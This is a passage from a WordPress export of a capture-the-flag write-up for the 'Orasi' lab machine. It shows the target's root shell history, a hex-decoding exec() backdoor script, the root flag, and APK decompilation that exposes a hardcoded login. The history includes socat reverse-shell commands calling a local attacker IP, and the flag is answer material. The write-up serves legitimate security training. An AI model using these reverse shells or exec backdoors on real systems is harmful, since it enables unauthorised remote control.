\/etc\/crontab\n\/bin\/bash \/root\/.cron\/check.sh \n\/bin\/bash \/root\/.cron\/check.sh \nwhich bash\n\/usr\/bin\/bash \/root\/.cron\/check.sh \nnano \/root\/.cron\/check.sh\n\/bin\/bash \/root\/.cron\/check.sh \nnano \/root\/.cron\/check.sh\n\/bin\/bash \/root\/.cron\/check.sh \n\/usr\/bin\/bash \/root\/.cron\/check.sh \n\/usr\/bin\/bash \/root\/.cron\/check.sh\nnano \/root\/.cron\/check.sh\nls -la\ncd .cron\nls\nchmod +x check.sh\ncd\nrm -rf cron\nclear\n\/usr\/bin\/bash 
\/root\/.cron\/check.sh\n\/root\/.cron\/check.sh\nnano \/root\/.cron\/check.sh\n\/root\/.cron\/check.sh\n\/bin\/sh \/root\/.cron\/check.sh\nnano \/root\/.cron\/check.sh\n\/bin\/sh \/root\/.cron\/check.sh\n\/bin\/bash \/root\/.cron\/check.sh\nls\nls -la\ncd .cron\nls\n.\/check.sh\nnano check.sh\n.\/check.sh\nnano check.sh\n.\/check.sh\nnano check.sh\n.\/check.sh\nnano check.sh\n\/bin\/bash \/root\/.cron\/check.sh\nnano check.sh\nnano check.sh\n\/bin\/bash \/root\/.cron\/check.sh\nmv check.sh check\n\/bin\/bash \/root\/.cron\/check\nnano check.sh\nnano check\nrm check\nclear\nnano check\nchmod +x check\n.\/check\n\/bin\/bash check\n\/bin\/bash \/root\/.cron\/check\ncd\nnano \/etc\/crontab\n\/bin\/bash \/root\/.cron\/check\ncd .cron\nls -la\nchmod 600 check\n\/bin\/bash \/root\/.cron\/check\nls -la\nchmod +x check\nls -la\nchmod 700 check\nls -la\n\/bin\/bash \/root\/.cron\/check\ncd\nclear\nsudo \/etc\/init.d\/apache stop\nsudo \/etc\/init.d\/apache2 stop\nreboot\nclear\ncd \/var\/www\/html\nls\nnano server.py\nclear\nreboot\nclear\ncd \/var\/www\/html\nls\nnano index.html\nreboot\nclear\ncd \/etc\/systemd\/system\/\nls\ncat orasi.service\nnano orasi.service\nreboot\ncd \/var\/www\/html\nls\nclear\nmv server.py pyth0ns3rv3ros.py\nreboot\nwhich rbash\nexit\ncd\nls\necho &quot;b1c17c79773c831cbb9109802059c6b5&quot; &gt; root.txt\nls -la\nchmod 600 root.txt\nls -la\ncat root.txt\nclear\nexit\nwhich socat\nshell\nzsh\nrbash\nsudo apt-get install socat\nclear\nls\nls\ncd \/home\nls\ncd kori\nls\nwget 10.0.2.15:8000\/jail.php\ncat jail.php\nphp jail.php &quot;socat TCP:10.0.2.15:4444 EXEC:sh&quot;\nnano jail.php\nphp jail.php &quot;socat TCP:10.0.2.15:4444 EXEC:sh&quot;\nclear\nls\nchown kori:kori jail.php\nphp jail.php &quot;socat TCP:10.0.2.15:4444 EXEC:sh&quot;\nsudo su kori\nsu kori\nclear\nls\nls -la\ncd\nclear\nnano \/etc\/sudo\nnano \/etc\/sudoers\nsu kori\nnano \/etc\/sudoers\nexit\nsu www-data\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nwhich 
php\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nclear\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nsu kori\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nnano \/etc\/sudoers\nclear\nsu kori\nsudo apt-get install openssh-server\nclear\nnano \/etc\/sudoers\nls\nclear\nnano \/etc\/sudoers\npip3 install base64\nclear\npip3 install re\npip3 install re\npip install re\nclear\npwd\nls\nwget 10.0.2.15:8000\/oras.py\nclear\nls\nls -la\nchmod 600 oras.py\nchmod 700 oras.py\nls -la\nls\nclear\nexit\nls\ncat root.txt\nclear\nexit\nreboot\n(remote) root@orasi:\/root# cat oras.py\nimport os\nimport base64\nimport re\nimport sys\n\nname = input(&quot;: &quot;)\nname = bytes.fromhex(name).decode(&#039;utf-8&#039;)\nprint(exec(name))\n(remote) root@orasi:\/root# cat root.txt\nb1c17c79773c831cbb9109802059c6b5\n(remote) root@orasi:\/root# <\/code><\/pre>\n<h2>Working with an APK on Linux<\/h2>\n<p>Reading the writeups of more experienced players, there seems to be a way to work with the APK directly from the Linux command line:<\/p>\n<blockquote>\n<p><a href=\"https:\/\/github.com\/AL1ENUM\/walkthroughs\/blob\/main\/orasi.md\">https:\/\/github.com\/AL1ENUM\/walkthroughs\/blob\/main\/orasi.md<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ cp irida.apk irida.zip\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ unzip irida.zip\nArchive:  irida.zip\n  inflating: res\/color\/material_on_surface_disabled.xml  \n  inflating: res\/layout\/test_toolbar.xml  \n  inflating: res\/anim\/design_snackbar_in.xml  \n  --------------\n    inflating: res\/color\/design_icon_tint.xml  \n  inflating: res\/drawable\/abc_seekbar_tick_mark_material.xml  \n  inflating: classes.dex             \n extracting: res\/drawable-hdpi-v4\/notification_bg_normal.9.png  \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ 
ll\ntotal 16120\n-rw-rw-r--  1 kali kali  326592 Jun 13 11:16 a\n-rw-rw-r--  1 kali kali    2256 Jan  1  1981 AndroidManifest.xml\n-rw-rw-r--  1 kali kali 7480816 Jan  1  1981 classes.dex\n-rw-rw-r--  1 kali kali 4083889 Jun 13 12:08 irida.apk\n-rw-rw-r--  1 kali kali 4083889 Jun 13 12:19 irida.zip\ndrwxrwxr-x  8 kali kali    4096 Jun 13 12:19 kotlin\ndrwxrwxr-x  3 kali kali    4096 Jun 13 12:19 META-INF\ndrwxrwxr-x 46 kali kali    4096 Jun 13 12:19 res\n-rw-rw-r--  1 kali kali  482544 Jan  1  1981 resources.arsc\n-rw-rw-r--  1 kali kali   16976 Feb  7  2021 url\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ d2j-dex2jar classes.dex\ndex2jar classes.dex -&gt; .\/classes-dex2jar.jar\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ mkdir irida\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ procyon classes-dex2jar.jar -o .\/irida\n------------------<\/code><\/pre>\n<p>It looks like the app was also written in <code>kotlin<\/code>.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi]\n\u2514\u2500$ grep -Pnir irida .\/irida\/                         \n.\/irida\/com\/alienum\/irida\/ui\/login\/LoggedInUserView.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:7:import com.alienum.irida.data.model.LoggedInUser;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:8:import com.alienum.irida.data.Result;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModel.java:11:import com.alienum.irida.data.LoginRepository;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginActivity.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginResult.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginFormState.java:5:package 
com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModelFactory.java:5:package com.alienum.irida.ui.login;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModelFactory.java:7:import com.alienum.irida.data.LoginRepository;\n.\/irida\/com\/alienum\/irida\/ui\/login\/LoginViewModelFactory.java:8:import com.alienum.irida.data.LoginDataSource;\n.\/irida\/com\/alienum\/irida\/data\/LoginRepository.java:5:package com.alienum.irida.data;\n.\/irida\/com\/alienum\/irida\/data\/LoginRepository.java:7:import com.alienum.irida.data.model.LoggedInUser;\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:5:package com.alienum.irida.data;\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:10:import com.alienum.irida.data.model.LoggedInUser;\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:15:        if (s.equals(&quot;irida&quot;) &amp;&amp; s2.equals(this.protector(&quot;1#2#3#4#5&quot;))) {\n.\/irida\/com\/alienum\/irida\/data\/LoginDataSource.java:17:                return new Result.Success&lt;Object&gt;(new LoggedInUser(UUID.randomUUID().toString(), &quot;Irida Orasis&quot;));\n.\/irida\/com\/alienum\/irida\/data\/Result.java:5:package com.alienum.irida.data;\n.\/irida\/com\/alienum\/irida\/data\/model\/LoggedInUser.java:5:package com.alienum.irida.data.model;\n.\/irida\/com\/alienum\/irida\/R.java:5:package com.alienum.irida;\n.\/irida\/com\/alienum\/irida\/R.java:2756:        public static final int Theme_Irida = 2131689884;\n.\/irida\/com\/alienum\/irida\/BuildConfig.java:5:package com.alienum.irida;\n.\/irida\/com\/alienum\/irida\/BuildConfig.java:9:    public static final String APPLICATION_ID = &quot;com.alienum.irida&quot;;<\/code><\/pre>\n<p>The password can likewise be found this way.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Orasi Information gathering Port scan \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Orasi] \u2514\u2500$ rusts 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19,22,18],"tags":[],"class_list":["post-869","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn","category-reverse","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/869","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=869"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/869\/revisions"}],"predecessor-version":[{"id":870,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/869\/revisions\/870"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=869"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}